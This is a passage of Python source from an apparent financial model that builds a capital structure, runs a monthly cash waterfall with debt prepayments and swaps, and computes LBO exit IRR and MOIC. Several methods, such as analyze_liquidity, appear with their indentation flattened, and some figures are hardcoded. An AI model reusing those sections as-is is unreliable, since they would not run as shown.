            initial_balance = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'initial_balance'].iloc[0]['value'])
            # NOTE(review): term-loan rows use 'interest_date_start'/'amort_date_start'
            # while the Revolver branch reads 'interest_start_date' — confirm the
            # schema really differs per component.
            interest_start_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'interest_date_start'].iloc[0]['value'])
            amort_start_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'amort_date_start'].iloc[0]['value'])
            periodicity_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'periodicity_months'].iloc[0]['value'])
            annual_scheduled_amort = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'annual_schedule_amort'].iloc[0]['value'])
            # the same row's value_type tells whether amort is absolute or a percentage
            annual_scheduled_amort_type = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'annual_schedule_amort'].iloc[0]['value_type']
            if annual_scheduled_amort_type == 'percentage':
                annual_scheduled_amort = annual_scheduled_amort / 100
            day_count = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'day_count'].iloc[0]['value']
            sweep_percent = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'sweep_percent'].iloc[0]['value'])
            dsra_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'dsra_months'].iloc[0]['value'])
            oids = [] # a list of OID objects OID(balance, begin_date, end_date, oid_discount)
            dfcs = [] # a list of DFC objects DFC(balance, begin_date, end_date, oid_discount)
            oid_payments = {}
            dfc_payments = {}
            upsizes = {}
            prepays = {}
            effective_interest_rates = {}
            interest_payments = {}
            required_dsras = {}
            dsra_cash_movement = {}
            amortizations = {}
            principal_balances = {}
            flag_prepayable = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_prepayable'].iloc[0]['value'] == 'TRUE' else False
            flag_historicals = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_historicals'].iloc[0]['value'] == 'TRUE' else False
            min_cash_reserve_prepay = 0
            # NOTE(review): computed for both debt classes but only passed to
            # FixedDebt below — confirm FloatingDebt does not need it.
            flag_dsra_fund_by_lc = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_dsra_fund_by_lc'].iloc[0]['value'] == 'TRUE' else False
            if flag_prepayable:
                min_cash_reserve_prepay = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'prepay_min_cash_reserve'].iloc[0]['value'])
            # the 'class' field selects the concrete debt implementation
            if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'class'].iloc[0]['value'] == 'FloatingDebt':
                floating_debt = FloatingDebt(margins, # only floating debt has margin
                                             index, # only floating debt has index
                                             instrument_id,
                                             issue_date,
                                             maturity_date,
                                             term,
                                             initial_balance,
                                             interest_start_date,
                                             amort_start_date,
                                             periodicity_months,
                                             annual_scheduled_amort,
                                             min_cash_reserve_prepay,
                                             day_count,
                                             sweep_percent,
                                             dsra_months,
                                             oids, # a list of OID objects
                                             dfcs, # a list of DFC objects
                                             oid_payments,
                                             dfc_payments,
                                             upsizes,
                                             prepays,
                                             effective_interest_rates,
                                             interest_payments,
                                             required_dsras,
                                             dsra_cash_movement,
                                             amortizations,
                                             principal_balances,
                                             flag_prepayable,
                                             flag_historicals)
                # set_historical_size_change returns a tuple; element [2] is the
                # debt-activity dataframe consumed by the two calls below
                debt_activity_df = floating_debt.set_historical_size_change(self.scenarioMaster.forecastStartMonth)[2]
                floating_debt.set_historical_interest_payments(self.scenarioMaster.forecastStartMonth, debt_activity_df)
                floating_debt.set_historical_amortization(self.scenarioMaster.forecastStartMonth, debt_activity_df)
                # floating debt carries a 1% floor on the index rate
                floating_debt.set_effective_interest_rates(self.interestRates, self.scenarioMaster.forecastStartMonth, floor=0.01)
                capital_structure.append(floating_debt)
            if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'class'].iloc[0]['value'] == 'FixedDebt':
                """ for fixeddebt, the interest is a fixed constant """
                fixed_rate = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'fixed_rate']['value'].iloc[0]
                fixed_rate = float(fixed_rate)
                fixed_debt = FixedDebt(fixed_rate,
                                       instrument_id,
                                       issue_date,
                                       maturity_date,
                                       term,
                                       initial_balance,
                                       interest_start_date,
                                       amort_start_date,
                                       periodicity_months,
                                       annual_scheduled_amort,
                                       min_cash_reserve_prepay,
                                       day_count,
                                       sweep_percent,
                                       dsra_months,
                                       oids, # a list of OID objects
                                       dfcs, # a list of DFC objects
                                       oid_payments,
                                       dfc_payments,
                                       upsizes,
                                       prepays,
                                       effective_interest_rates,
                                       interest_payments,
                                       required_dsras,
                                       dsra_cash_movement,
                                       amortizations,
                                       principal_balances,
                                       flag_prepayable,
                                       flag_historicals,
                                       flag_dsra_fund_by_lc)
                debt_activity_df = fixed_debt.set_historical_size_change(self.scenarioMaster.forecastStartMonth)[2]
                fixed_debt.set_historical_interest_payments(self.scenarioMaster.forecastStartMonth, debt_activity_df)
                fixed_debt.set_historical_amortization(self.scenarioMaster.forecastStartMonth, debt_activity_df)
                # fixed debt needs no market curves: the rate is the constant above
                fixed_debt.set_effective_interest_rates()
                fixed_debt.build_principal_balances()
                capital_structure.append(fixed_debt)
        if component in ['OpCo']:
            financials_scenario_obj = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'financials'][0]
            financials_scenario = financials_scenario_obj.scenario
            financials_version = financials_scenario_obj.version
            financials_table = financials_scenario_obj.table
            working_capital={}
            other_cash_use={}
            liquidity_assumptions_df = self.assumptions
            # potentially needs a data type conversion here
            # keyed by date_end -> value for the two forced assumption accounts
            working_capital = liquidity_assumptions_df.loc[liquidity_assumptions_df.account=='Change In Working Capital'][['date_end','value']].set_index('date_end')['value'].to_dict()
            other_cash_use = liquidity_assumptions_df.loc[liquidity_assumptions_df.account=='Other Cash Use'][['date_end','value']].set_index('date_end')['value'].to_dict()
            # ebitda/capex start empty; presumably filled later from financials — TODO confirm
            opco = OperatingCompany(self.portfolio,
                                    financials_scenario,
                                    financials_version,
                                    financials_table,
                                    ebitda={},
                                    capex={},
                                    working_capital=working_capital,
                                    other_cash_use=other_cash_use)
            capital_structure.append(opco)
        if component in ['TaxRegister']:
            effective_tax_rate = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'effective_tax_rate'].iloc[0]['value']
            # all 'tax_split*' rows, sorted by field name so the split ratios
            # keep a stable, deterministic order
            tax_split_ratio_list = component_cap_structure_df.loc[component_cap_structure_df.field_name.str.contains('tax_split')][['field_name', 'value']].values.tolist()
            tax_split_ratio_list.sort(key = lambda x: x[0])
            tax_split_ratio_list = [float(item[1]) for item in tax_split_ratio_list]
            tax_register = TaxRegister(self.portfolio, effective_tax_rate=float(effective_tax_rate), tax_split_ratio=tax_split_ratio_list, paid_tax={})
            capital_structure.append(tax_register)
        # swap components are matched by substring, not exact name
        if 'swap' in component.lower():
            instrument_id = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'instrument_id'].iloc[0]['value']
            trade_date = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'trade_date'].iloc[0]['value']
            counterparty = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'counterparty'].iloc[0]['value']
            index = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'index'].iloc[0]['value']
            swap_rates = [[]]
            swap = Swap(self.portfolio, instrument_id, index, trade_date, counterparty, swap_rates)
            swap.get_swap_rates_from_db()
            capital_structure.append(swap)
        if component in ['Equity']:
            purchase_price = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'purchase_price'].iloc[0]['value']
            purchase_price = float(purchase_price)
            debt_percentage = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'debt_percentage'].iloc[0]['value']
            debt_percentage_value_type = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'debt_percentage'].iloc[0]['value_type']
            if debt_percentage_value_type == 'percentage':
                debt_percentage = float(debt_percentage) / 100
            name = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'name'].iloc[0]['value']
            exit_multiple = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'exit_multiple'].iloc[0]['value']
            exit_multiple = float(exit_multiple)
            irr_frequency = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'irr_frequency'].iloc[0]['value']
            exit_time = dateUtils.get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'exit_time'].iloc[0]['value'])
            periodicity_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'periodicity_months'].iloc[0]['value'])
            equity_component = Equity(name, purchase_price, debt_percentage, exit_multiple, irr_frequency, exit_time, periodicity_months)
            capital_structure.append(equity_component)
    self.capitalStructure = capital_structure
    return capital_structure
# # 2. waterfall
# waterfall = [input_scenario for input_scenario in self.ScenarioMaster.inputScenarios.scenario if input_scenario.module == 'waterfall'][0]
# waterfall_scenario = waterfall.scenario
# waterfall_version = waterfall.version
def __initialize_waterfall(self):
    """Fetch the waterfall dataframe, ordered by (level, sub_level).

    Looks up the 'waterfall' input scenario once and loads the cash
    inflow/outflow priority rows from the database. (The original
    scanned the scenario list with the identical comprehension twice —
    once for the scenario name and once for the version.)
    """
    wf_scenario = [s for s in self.scenarioMaster.inputScenarios
                   if s.module == 'waterfall'][0]
    waterfall_df = dbLiquidity.get_waterfall(self.portfolio, wf_scenario.scenario, wf_scenario.version)
    # evaluation order of the waterfall is ascending level, then sub_level
    waterfall_df = waterfall_df.sort_values(['level', 'sub_level'], ascending=[True, True])
    return waterfall_df
def __initialize_metadata(self):
sorted_months_index = list(sorted((set(self.scenarioMaster.actualMonths + self.scenarioMaster.forecastMonths))))
# waterfall_df = self.waterfall.copy()
# waterfall_df = waterfall_df.sort_values(["level", "sub_level"], ascending=(True, True))
# waterfall_df['instrument_name'] = waterfall_df['instrument'] + " - " + waterfall_df['item']
# all_instrument_names = list(waterfall_df['instrument_name'])
# all_instrument_names.insert(0, 'Beginning Cash Balance')
# all_instrument_names.insert(len(all_instrument_names), 'Ending Cash Balance')
cashflow_df = pd.DataFrame(index=sorted_months_index, columns=['Beginning Cash Balance'], data=0)
# metadata_df.to_csv("metadata_df.csv")
# metadata_df.T.to_csv("metadata_df_T.csv")
return {'cashflow': cashflow_df}
def set_cashflow_with_waterfall(self):
    """Populate the 'cashflow' dataframe by walking the waterfall.

    Iterates the waterfall rows in (level, sub_level) order and, for
    each component/item pair, writes one column into
    ``self.metadata['cashflow']`` named ``"<instrument> - <item>"``
    (item lowercased), sourced from the matching capital-structure
    object. Items with no model yet (dsra release, equity sweep, swap
    interest, tax-register ptd) are filled with 0.0.

    Changes vs. original: the column label and the lowercased item were
    recomputed inline for every branch (~20 copies of the same
    expression) and ``self.metadata['cashflow']`` was re-looked-up on
    every assignment; both are now hoisted. Branch structure and every
    written value are unchanged.
    """
    cashflow = self.metadata['cashflow']  # same DataFrame object; columns added in place
    level = 1
    max_level = self.waterfall.level.max()
    while level <= max_level:
        level_rows = self.waterfall.loc[self.waterfall.level == level]
        sub_level = 1
        max_sub_level = level_rows.sub_level.max()
        while sub_level <= max_sub_level:
            for _, comp in level_rows.loc[level_rows.sub_level == sub_level].iterrows():
                instrument = comp.instrument
                item_lc = comp['item'].lower()
                # every cashflow column is "<instrument> - <item lowercased>"
                column = instrument + " - " + item_lc
                """ Operating Company related components """
                if instrument == 'OpCo':
                    opco = [c for c in self.capitalStructure if isinstance(c, OperatingCompany)][0]
                    if item_lc == 'ebitda':
                        cashflow[column] = pd.Series(opco.ebitda)
                    if item_lc == 'capex':
                        cashflow[column] = pd.Series(opco.capex)
                    if item_lc == 'working capital':
                        cashflow[column] = pd.Series(opco.workingCapital)
                    if item_lc == 'other cash use':
                        cashflow[column] = pd.Series(opco.otherCashUse)
                    if item_lc == 'cfo':
                        cashflow[column] = pd.Series(opco.build_cfo())
                """ Revolver related components """
                if instrument == 'Revolver':
                    revolver = [c for c in self.capitalStructure if isinstance(c, Revolver)][0]
                    if item_lc == 'draw':
                        cashflow[column] = pd.Series(revolver.upsizes)
                    # repayments and interest are cash outflows, hence negated
                    if item_lc == 'repay':
                        cashflow[column] = - pd.Series(revolver.prepays)
                    if item_lc == 'interest expense':
                        cashflow[column] = - pd.Series(revolver.interestPayments)
                """ Term Loan related components """
                if instrument in ['TLB', 'TLC']:
                    # instrumentID convention: "<portfolio> <TLB|TLC>"
                    tl_obj = [c for c in self.capitalStructure
                              if isinstance(c, Debt) and c.instrumentID == self.portfolio + " " + instrument][0]
                    if item_lc == 'interest expense':
                        cashflow[column] = pd.Series(tl_obj.interestPayments)
                    if item_lc == 'amortization':
                        cashflow[column] = pd.Series(tl_obj.amortizations)
                    if item_lc == 'dsra release':
                        cashflow[column] = 0.0
                    if item_lc == 'prepayment':
                        cashflow[column] = - pd.Series(tl_obj.prepays)
                    if item_lc == 'upsize':
                        cashflow[column] = pd.Series(tl_obj.upsizes)
                """ Portfolio level """
                if instrument in ['Portfolio']:
                    """ permitted tax distribution """
                    if item_lc == 'ptd':
                        distributions = dbLiquidity.get_distributions(self.portfolio)
                        # keep only distributions that occurred before the forecast window
                        distributions = [d for d in distributions if d < self.scenarioMaster.forecastStartMonth]
                        cashflow[column] = pd.Series(distributions)
                if instrument in ['Equity']:
                    if item_lc == 'sweep':
                        cashflow[column] = 0.0
                if instrument in ['Swap']:
                    if item_lc == 'interest expense':
                        cashflow[column] = 0.0
                if instrument in ['TaxRegister']:
                    if item_lc == 'ptd':
                        cashflow[column] = 0.0
            sub_level += 1
        level += 1
""" analyze liquidity method has more customizations for existing portfolio """
def analyze_liquidity(self):
""" step 1, build initial cash balances """
cash_balances_df = dbLiquidity.get_cash_balance(self.portfolio, self.scenarioMaster.forecastStartMonth)
self.__build_beginning_cash(cash_balances_df)
""" step 2, build debt related components """
debt_components = [item for item in self.capitalStructure if isinstance(item, FloatingDebt)]
for debt_item in debt_components:
""" step 2.1 build balance """
debt_item.build_principal_balances()
""" step 3, build swap related components """
swap_components = [item for item in self.capitalStructure if isinstance(item, Swap)]
total_swap_interest_payment_df = pd.DataFrame()
total_swap_detail_df = pd.DataFrame()
for swap_item in swap_components:
""" step 3.1 """
swap_item.build_swap_interest_payments(self.interestRates)
start_month = self.metadata['cashflow'].index.min()
end_month = self.metadata['cashflow'].index.max()
swap_item_interest_payment_df = swap_item.build_swap_payments_by_month(start_month, end_month)
# swap_item_interest_payment_df.to_csv(swap_item.instrumentID + "_swap_detail.csv")
pd.DataFrame(swap_item.swapRates).to_csv(swap_item.instrumentID + "_swap_raw_detail.csv")
total_swap_interest_payment_df = total_swap_interest_payment_df.append(swap_item_interest_payment_df)
swap_item_raw_detail_df = pd.DataFrame(data=swap_item.swapRates, columns=['date_fix_rate', 'date_start', 'date_end', 'notional', 'fix_rate', 'floating_rate', 'number_of_days', 'swap_per_day'])
swap_item_raw_detail_df['swap_instrument_id'] = swap_item.instrumentID
total_swap_detail_df = total_swap_detail_df.append(swap_item_raw_detail_df)
self.metadata['swap_payment'] = total_swap_interest_payment_df
self.metadata['swap_detail'] = total_swap_detail_df
pivot_swap_interest_payment_df = pd.pivot_table(total_swap_interest_payment_df, values='total_interest_payment', columns='instrument_id', index='month_end', aggfunc=np.sum)
pivot_swap_interest_payment_df.fillna(value={'total_interest_payment':0.0}, inplace=True)
pivot_swap_interest_payment_df['Swap - interest expense'] = - pivot_swap_interest_payment_df[list(pivot_swap_interest_payment_df.columns)].sum(axis=1)
pivot_swap_interest_payment_df = pivot_swap_interest_payment_df.loc[pivot_swap_interest_payment_df.index >= self.scenarioMaster.forecastStartMonth]
self.metadata['cashflow']['Swap - interest expense'] = pd.Series(pivot_swap_interest_payment_df['Swap - interest expense'])
""" step 4, build ptd related components """
opco = [item for item in self.capitalStructure if isinstance(item, OperatingCompany)][0]
entity_capex_df = opco.get_entity_capex()
entity_list = list(set(entity_capex_df.entity))
additional_capex_dict = {}
entity_capex_df['year'] = entity_capex_df.apply(lambda row: row['period'].year, axis=1)
for entity in entity_list:
additional_capex_dict[entity] = entity_capex_df.loc[entity_capex_df.entity == entity].groupby(['year'])['value'].agg(sum).to_dict()
year_range = list(range(self.metadata['cashflow'].index.min().year, self.metadata['cashflow'].index.max().year+1))
for year in year_range:
start_date = date(year, 1, 1)
end_date = date(year, 12, 31)
""" hardcoded for now """
total_oid = 5201004
total_dfc = 9535996
total_ebitda = self.metadata['cashflow'][start_date:end_date]['OpCo - ebitda'].sum()
# additional_capex_dict = {'Gavin':{2020:55145000, 2021:111111111}, .... }
ptd_schedule = self.__build_ptd(year, total_oid, total_ebitda, total_dfc, additional_capex_dict, total_interest_expense=None)
ptd_period_list = [date(year, 3, 31), date(year, 6, 30), date(year, 9, 30), date(year, 12, 31)]
for ptd_period in ptd_period_list:
self.metadata['cashflow'].at[ptd_period, 'TaxRegister - ptd'] = - ptd_schedule[ptd_period_list.index(ptd_period)]
""" step 5, do cash waterfall month over month staring the forecast phase """
cash_waterfall_forecast_months = self.scenarioMaster.forecastMonths
for forecast_month in cash_waterfall_forecast_months:
beginning_cash = self.metadata['cashflow'].loc[forecast_month]['Beginning Cash Balance']
if str(beginning_cash) == 'nan':
beginning_cash = 0.0
cashflow_for_period = beginning_cash
""" waterfall is ordered by level and sub level """
for index, waterfall_item in self.waterfall.iterrows():
""" 3 key configurable variables to determine how to react on the cash """
instrument = waterfall_item['instrument']
item = waterfall_item['item']
method = waterfall_item['method']
direction = waterfall_item['direction']
direction_sign = 1 if direction == 'inflow' else -1
""" OpCo items already set from initialization phase """
if instrument == 'OpCo':
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
if instrument == 'Revolver':
revolver_obj = [item for item in self.capitalStructure if isinstance(item, Revolver)][0]
if item == 'interest expense':
revolver_interest_expense = revolver_obj.calculate_interest_expense(forecast_month)
cashflow_for_period += revolver_interest_expense * direction_sign
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = revolver_interest_expense * direction_sign
if item in ['draw','repay']:
""" for now we use manual revolver adjustment """
""" revolver draw or repay balances will be set on the initialization phase """
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
continue
if instrument in ['Swap']:
if item == 'interest expense':
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
continue
if instrument == 'TaxRegister':
if item == 'ptd':
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
continue
if instrument in ['TLB', 'TLC']:
tl_obj = [item for item in self.capitalStructure if isinstance(item, FloatingDebt) and item.instrumentID == self.portfolio + " " + instrument][0]
if item == 'interest expense':
tl_interest_expense = tl_obj.calculate_interest_expense(forecast_month)
cashflow_for_period += tl_interest_expense * direction_sign
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = tl_interest_expense * direction_sign
if item == 'prepayment':
flag_prepayable = tl_obj.flagPrepayable
periodicity_months =tl_obj.periodicityMonths
prepayment = 0
if flag_prepayable and forecast_month.month % periodicity_months == 0:
min_cash_reserve = tl_obj.minCashReservePrepay
prepayment = max([0, cashflow_for_period - min_cash_reserve])
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = prepayment * direction_sign
tl_obj.prepay_debt(forecast_month, self.scenarioMaster.forecastStartMonth, prepayment)
else:
""" for debt which is not prepayable or not in periodicity, just present 0s for prepayment even with excess cash """
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = 0.0
continue
cashflow_for_period += prepayment * direction_sign
next_month_end = dateUtils.get_one_month_later(forecast_month)
if next_month_end <= self.metadata['cashflow'].index.max():
self.metadata['cashflow'].at[next_month_end, 'Beginning Cash Balance'] = cashflow_for_period
revolver = [ item for item in self.capitalStructure if isinstance(item, Revolver)][0]
# pd.DataFrame.from_dict(revolver.interestPayments, orient='index').to_csv("revolver_balances.csv")
tlb = [ item for item in self.capitalStructure if isinstance(item, FloatingDebt) and item.instrumentID == 'Lightstone TLB'][0]
tlb_df = pd.DataFrame.from_dict(tlb.principalBalances, columns=['balance'], orient='index')
tlb_df['upsize'] = pd.Series(tlb.upsizes)
tlb_df['prepay'] = pd.Series(tlb.prepays)
tlb_df['margin'] = 0.0375
tlb_df['floating_rate'] = pd.Series(tlb.effectiveInterestRates)
tlb_df['floating_rate'] = tlb_df['floating_rate'] - tlb_df['margin']
tlb_df['interest_payments'] = pd.Series(tlb.interestPayments)
tlb_df = tlb_df.T
tlb_df.to_csv("tlb.csv")
tlc = [ item for item in self.capitalStructure if isinstance(item, FloatingDebt) and item.instrumentID == 'Lightstone TLC'][0]
tlc_df = pd.DataFrame.from_dict(tlc.principalBalances, columns=['balance'], orient='index')
tlc_df['upsize'] = pd.Series(tlc.upsizes)
tlc_df['prepay'] = pd.Series(tlc.prepays)
tlc_df['margin'] = 0.0375
tlc_df['floating_rate'] = pd.Series(tlc.effectiveInterestRates)
tlc_df['floating_rate'] = tlc_df['floating_rate'] - tlc_df['margin']
tlc_df['interest_payments'] = pd.Series(tlc.interestPayments)
tlc_df = tlc_df.T
# tlc_df.to_csv("tlc.csv")
""" when we do lbo analysis, we usually do not need too much customizations, we only need assumptions """
    def analyze_leverage_buyout(self):
        """Run an LBO cash waterfall month over month, then compute exit economics.

        Walks self.metadata['cashflow'] column by column in waterfall order
        (column names are '<Instrument> - <item>'), writing computed debt
        service and equity sweeps back into the frame, then values the exit.

        Returns:
            tuple: (equity_annual_cashflow_list, irr, moic) from the Equity
            object's IRR/MOIC calculation.
        """
        """ step 1, get beginning cash if available """
        cash_balances_df = dbLiquidity.get_cash_balance(self.portfolio, self.scenarioMaster.forecastStartMonth)
        if len(cash_balances_df) > 0:
            self.__build_beginning_cash(cash_balances_df)
        else:
            # no recorded balances: assume the model starts with zero cash
            self.metadata['cashflow']['Beginning Cash Balance'] = 0.0
        """ step 2, follow the order of cash waterfall """
        monthly_cashflow = 0.0
        for index, row in self.metadata['cashflow'].iterrows():
            for cash_item_title in self.metadata['cashflow'].columns:
                if cash_item_title == 'Beginning Cash Balance':
                    if index.year == self.scenarioMaster.startYear and index.month == 1:
                        # very first month seeds the running cash from the frame
                        monthly_cashflow = row[cash_item_title]
                    else:
                        # subsequent months: carry forward last month's ending cash
                        self.metadata['cashflow'].at[index, cash_item_title] = monthly_cashflow
                    continue
                # column naming convention '<Instrument> - <item>'
                # NOTE(review): `object` shadows the builtin — local only
                object = cash_item_title.split(" - ")[0]
                object_item = cash_item_title.split(" - ")[1]
                if object == 'OpCo':
                    # operating cash items were populated during initialization
                    monthly_cashflow += row[cash_item_title]
                if object == 'TLB':
                    tlb_obj = [item for item in self.capitalStructure if isinstance(item, Debt) and item.instrumentID == self.portfolio + " TLB"][0]
                    if object_item.lower() == 'interest expense':
                        required_interest_payment = tlb_obj.calculate_interest_expense(index)
                        self.metadata['cashflow'].at[index, cash_item_title] = -required_interest_payment
                        monthly_cashflow -= required_interest_payment
                    if object_item.lower() == 'amortization':
                        required_amort = tlb_obj.calculate_amortization(index)
                        self.metadata['cashflow'].at[index, cash_item_title] = -required_amort
                        monthly_cashflow -= required_amort
                    if object_item.lower() == 'prepayment':
                        # sweep whatever cash remains after interest + amort
                        available_cash = monthly_cashflow
                        prepayment = tlb_obj.calculate_prepayment(index, available_cash)
                        self.metadata['cashflow'].at[index, cash_item_title] = -prepayment
                        monthly_cashflow -= prepayment
                if object == 'Equity':
                    equity_obj = [item for item in self.capitalStructure if isinstance(item, Equity)][0]
                    if object_item.lower() == 'sweep':
                        equity_sweep = equity_obj.calculate_equity_sweep(index, monthly_cashflow)
                        self.metadata['cashflow'].at[index, cash_item_title] = -equity_sweep
                        monthly_cashflow -= equity_sweep
        """ exit phase analysis """
        equity_obj = [item for item in self.capitalStructure if isinstance(item, Equity)][0]
        exit_time = equity_obj.exitTime
        tl_objects = [item for item in self.capitalStructure if isinstance(item, Debt)]
        # debt outstanding at exit reduces the equity proceeds
        ending_debt_balances = sum([item.principalBalances[exit_time] for item in tl_objects])
        tlb_object = tl_objects[0]
        # exit value is based on trailing-twelve-month EBITDA ending at exit
        last_tweleve_months_start_date = dateUtils.get_months_shift_date(exit_time, -11)
        last_tweleve_months_ebitda = self.metadata['cashflow'].loc[last_tweleve_months_start_date:exit_time]['OpCo - ebitda'].sum()
        equity_exit_value = equity_obj.calculate_exit_value(last_tweleve_months_ebitda)
        equity_annual_cashflow_list, irr, moic = equity_obj.calculate_irr_and_moic(self.metadata['cashflow'][['Equity - sweep']], equity_exit_value - ending_debt_balances)
        print (irr)
        print ("first")
        print ([item/1000000.0 for item in equity_annual_cashflow_list], irr, moic)
        print ("------------------------------------------------")
        return equity_annual_cashflow_list, irr, moic
""" A key function here to solve for a purchase price with targetted IRR """
def solve_purchase_price_by_irr(self, targeted_irr):
data = (targeted_irr, self)
equity_obj = [item for item in self.capitalStructure if isinstance(item, Equity)][0]
purchase_price = 1
result_purchase_price = fsolve(self.solver_purchase_price, x0=purchase_price, args=data, factor=100, xtol=0.000001)
print ("result: ", str(result_purchase_price[0]))
""" solver for purchase price """
    @staticmethod
    def solver_purchase_price(purchase_price, *args):
        """fsolve residual: rerun the LBO waterfall at *purchase_price* and
        return (targeted_irr - achieved_irr).

        Args:
            purchase_price: 1-element array-like from fsolve; element 0 is
                the trial purchase price.
            *args: (targeted_irr, liquidity_obj) as packed by
                solve_purchase_price_by_irr.

        Side effects: resets the equity purchase price and the first Debt
        object's balance/prepay/amort/upsize state, then rewrites
        liquidity_obj.metadata['cashflow'] — the same in-place waterfall as
        analyze_leverage_buyout.
        """
        targeted_irr, liquidity_obj = args
        """ exit phase analysis """
        equity_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Equity)][0]
        """ reset equity purchase price! """
        equity_obj.purchasePrice = purchase_price[0]
        # debt sized as a fixed percentage of the trial purchase price;
        # prior trials' schedules are wiped before rebuilding balances
        tl_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Debt)][0]
        tl_obj.initialBalance = purchase_price[0] * equity_obj.debtPercentage
        tl_obj.prepays = {}
        tl_obj.amortizations = {}
        tl_obj.upsizes = {}
        tl_obj.build_principal_balances()
        """ step 1, get beginning cash if available """
        cash_balances_df = dbLiquidity.get_cash_balance(liquidity_obj.portfolio, liquidity_obj.scenarioMaster.forecastStartMonth)
        if len(cash_balances_df) > 0:
            # name-mangled private call resolves because this staticmethod is
            # defined inside the same class as __build_beginning_cash
            liquidity_obj.__build_beginning_cash(cash_balances_df)
        else:
            liquidity_obj.metadata['cashflow']['Beginning Cash Balance'] = 0.0
        """ step 2, follow the order of cash waterfall """
        monthly_cashflow = 0.0
        for index, row in liquidity_obj.metadata['cashflow'].iterrows():
            for cash_item_title in liquidity_obj.metadata['cashflow'].columns:
                if cash_item_title == 'Beginning Cash Balance':
                    if index.year == liquidity_obj.scenarioMaster.startYear and index.month == 1:
                        monthly_cashflow = row[cash_item_title]
                    else:
                        liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = monthly_cashflow
                    continue
                # column naming convention '<Instrument> - <item>'
                object = cash_item_title.split(" - ")[0]
                object_item = cash_item_title.split(" - ")[1]
                if object == 'OpCo':
                    monthly_cashflow += row[cash_item_title]
                if object == 'TLB':
                    tlb_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Debt) and item.instrumentID == liquidity_obj.portfolio + " TLB"][0]
                    if object_item.lower() == 'interest expense':
                        required_interest_payment = tlb_obj.calculate_interest_expense(index)
                        liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -required_interest_payment
                        monthly_cashflow -= required_interest_payment
                    if object_item.lower() == 'amortization':
                        required_amort = tlb_obj.calculate_amortization(index)
                        liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -required_amort
                        monthly_cashflow -= required_amort
                    if object_item.lower() == 'prepayment':
                        available_cash = monthly_cashflow
                        prepayment = tlb_obj.calculate_prepayment(index, available_cash)
                        liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -prepayment
                        monthly_cashflow -= prepayment
                if object == 'Equity':
                    equity_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Equity)][0]
                    if object_item.lower() == 'sweep':
                        equity_sweep = equity_obj.calculate_equity_sweep(index, monthly_cashflow)
                        liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -equity_sweep
                        monthly_cashflow -= equity_sweep
        # exit economics: trailing-twelve-month EBITDA valuation, net of debt
        exit_time = equity_obj.exitTime
        tl_objects = [item for item in liquidity_obj.capitalStructure if isinstance(item, Debt)]
        ending_debt_balances = sum([item.principalBalances[exit_time] for item in tl_objects])
        tlb_object = tl_objects[0]
        last_tweleve_months_start_date = dateUtils.get_months_shift_date(exit_time, -11)
        last_tweleve_months_ebitda = liquidity_obj.metadata['cashflow'].loc[last_tweleve_months_start_date:exit_time]['OpCo - ebitda'].sum()
        equity_exit_value = equity_obj.calculate_exit_value(last_tweleve_months_ebitda)
        equity_annual_cashflow_list, irr, moic = equity_obj.calculate_irr_and_moic(liquidity_obj.metadata['cashflow'][['Equity - sweep']], equity_exit_value - ending_debt_balances)
